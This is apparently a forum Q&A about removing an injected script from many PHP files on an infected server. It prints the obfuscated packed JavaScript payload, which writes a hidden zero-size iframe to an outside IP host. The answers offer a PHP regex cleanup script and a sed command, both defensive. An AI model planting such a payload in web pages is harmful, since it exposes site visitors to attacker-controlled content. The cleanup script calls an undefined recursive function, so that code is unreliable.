I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output
here the virus code :
<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|125||src|height|230|width|board||248|php|58|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>
Above code in every single php file. How can i remove this virus code from every php file ? Is there a quick way for doing it?
You can use:
removeVirus.php
<?php
foreach(rglob("*.php") as $virusFile){
$withVirus = file_get_contents($virusFile);
$withoutVirus = preg_replace('%<tag\d+>.*</tag\d+>%', '', $withVirus);
file_put_contents($virusFile, $withoutVirus);
}
function rglob($pattern, $flags = 0){
// forked from https://github.com/rodurma/PHP-Functions/
// blob/master/glob_recursive.php
$files = glob($pattern, $flags);
foreach (glob(dirname($pattern).'/*',
GLOB_ONLYDIR|GLOB_NOSORT) as $dir){
$files = array_merge($files, glob_recursive
($dir.'/'.basename($pattern), $flags));
}
return $files;
}
Usage:
put removeVirus.php
on the root of your website and execute from the shell as root (or as the owner of the files)
php removeVirus.php
Notes:
1 - I've tested the code on my server with 10 php
files containing the virus and it worked as intended.
2 - Make sure you find the source of the hack and patch your system accordingly.
If the "virus code" string literal you have provided is embedded in every php file, then it can be removed via command line. Open the shell application (Command Prompt for Windows or Terminal for UNIX/UNIX-based operating systems e.g. OS X, Linux, etc). You will need to escape the virus code before you pass it to the shell, however the ideal methods may vary dependent on your system. Execute the following commands:
cd /path/to/your/infected/php/files
sed -i 's/insert_escaped_virus_code_here//g' *
P.S. If see has not yet been installed, then follow these directions for OS X and Windows.